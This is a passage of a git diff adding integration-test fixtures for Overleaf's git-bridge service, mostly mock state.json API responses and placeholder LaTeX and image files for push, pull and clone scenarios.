b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410-copy.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410-copy.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410-copy.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/000000000000000000000000/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json new file mode 100644 index 0000000..4b969e0 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPullUpdatedBinaryFiles/withUpdatedBinaryFiles/state.json @@ -0,0 +1,80 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 2, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 2, + "comment": "i deleted the image", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:48:01.123Z" + }, + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 2, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4003/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + }, + { + "url": "http://127.0.0.1:4003/withUpdatedBinaryFiles/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410-copy.png" + } + ] + }, + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410.png" + }, + { + "url": "http://127.0.0.1:4003/base/000000000000000000000000/overleaf-white-410.png", + "path": "overleaf-white-410-copy.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/state.json new file mode 100644 index 0000000..2850c9e --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canPushFilesSuccessfully/state/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3866/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/state.json new file mode 100644 index 0000000..0e8df4c --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/canServePushedFiles/state/state.json @@ -0,0 +1,29 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "test1@example.com", + "name": "John+1" + }, + "getSavedVers": [], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "success", + "versionID": 1 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneA4xxProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneA4xxProject/state/state.json new file mode 100644 index 0000000..f8c76c1 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneA4xxProject/state/state.json @@ -0,0 +1,18 @@ +[ + { + "project": "gone", + "getDoc": { + "error": 410, + "versionID": 1, + "createdAt": "2018-02-05T15:30:00Z", + "email": "michael.walker@overleaf.com", + "name": "msw" + }, + "getSavedVers": [], + "getForVers": [], + "push": "success", + "postback": { + "type": "outOfDate" + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAHasDotGitProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAHasDotGitProject/state/state.json new file mode 100644 index 0000000..23bf520 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAHasDotGitProject/state/state.json @@ -0,0 +1,19 @@ +[ + { + "project": "conflict", + "getDoc": { + "error": 409, + "code": "projectHasDotGit", + "versionID": 1, + "createdAt": "2018-02-05T15:30:00Z", + "email": "michael.walker@overleaf.com", + "name": "msw" + }, + "getSavedVers": [], + "getForVers": [], + "push": "success", + "postback": { + "type": "outOfDate" + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAMissingProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAMissingProject/state/state.json new file mode 100644 index 0000000..1db62b0 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAMissingProject/state/state.json @@ -0,0 +1,18 @@ +[ + { + "project": "missing", + "getDoc": { + "error": 404, + "versionID": 1, + "createdAt": "2018-02-06T13:29:00Z", + "email": "michael.walker@overleaf.com", + "name": "msw" + }, + "getSavedVers": [], + "getForVers": [], + "push": "success", + "postback": { + "type": "outOfDate" + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json new file mode 100644 index 0000000..859bc62 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/cannotCloneAProtectedProjectWithoutAuthentication/state/state.json @@ -0,0 +1,173 @@ +[ + { + "project": "protected", + "getDoc": { + "error": 403, + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "contentchanged\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "outOfDate" + } + }, + { + "project": "invalidFiles", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "changedñcontent\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "invalidFiles", + "errors": [ + { + "file": "file.invalid", + "state": "error" + }, + { + "file": "virus.exe", + "state": "disallowed" + }, + { + "file": "my image.jpg", + "state": "unclean_name", + "cleanFile": "my_image.jpg" + } + ] + } + }, + { + "project": "invalidProject", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "invalidProject", + "errors": [ + "No main.tex file exists." + ] + } + }, + { + "project": "error", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.456Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [] + } + ], + "push": "success", + "postback": { + "type": "error" + } + } +] \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/state.json new file mode 100644 index 0000000..5a9742f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnFirstStageOutOfDate/state/state.json @@ -0,0 +1,46 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3867/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "outOfDate", + "postback": { + "type": "success", + "versionID": 2 + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/state.json new file mode 100644 index 0000000..dbbe395 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidFiles/state/state.json @@ -0,0 +1,65 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3869/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "invalidFiles", + "errors": [ + { + "file": "file1.invalid", + "state": "error" + }, + { + "file": "file2.exe", + "state": "disallowed" + }, + { + "file": "hello world.png", + "state": "unclean_name", + "cleanFile": "hello_world.png" + }, + { + "file": "an image.jpg", + "state": "unclean_name", + "cleanFile": "an_image.jpg" + } + ] + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/state.json new file mode 100644 index 0000000..0746cf9 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnInvalidProject/state/state.json @@ -0,0 +1,49 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3870/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "invalidProject", + "errors": [ + "project: no main file", + "The project would have no (editable) main .tex file." + ] + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png new file mode 100644 index 0000000..74e1fcd Binary files /dev/null and b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png differ diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/state.json b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/state.json new file mode 100644 index 0000000..45ec2a9 --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnSecondStageOutOfDate/state/state.json @@ -0,0 +1,45 @@ +[ + { + "project": "000000000000000000000000", + "getDoc": { + "versionID": 1, + "createdAt": "2014-11-30T18:40:58.123Z", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1" + }, + "getSavedVers": [ + { + "versionID": 1, + "comment": "added more info on doc GET and error details", + "email": "jdleesmiller+1@gmail.com", + "name": "John+1", + "createdAt": "2014-11-30T18:47:01.333Z" + } + ], + "getForVers": [ + { + "versionID": 1, + "srcs": [ + { + "content": "content\n", + "path": "main.tex" + }, + { + "content": "This text is from another file.", + "path": "foo/bar/test.tex" + } + ], + "atts": [ + { + "url": "http://127.0.0.1:3868/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png", + "path": "min_mean_wait_evm_7_eps_150dpi.png" + } + ] + } + ], + "push": "success", + "postback": { + "type": "outOfDate" + } + } +] diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/foo/bar/test.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/foo/bar/test.tex new file mode 100644 index 0000000..046794f --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/foo/bar/test.tex @@ -0,0 +1 @@ +This text is from another file. \ No newline at end of file diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/main.tex b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/main.tex new file mode 100644 index 0000000..d95f3ad --- /dev/null +++ b/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/main.tex @@ -0,0 +1 @@ +content diff --git a/services/git-bridge/src/test/resources/uk/ac/ic/wlgitbridge/WLGitBridgeIntegrationTest/pushFailsOnUnexpectedError/state/000000000000000000000000/min_mean_wait_evm_7_eps_150dpi.png 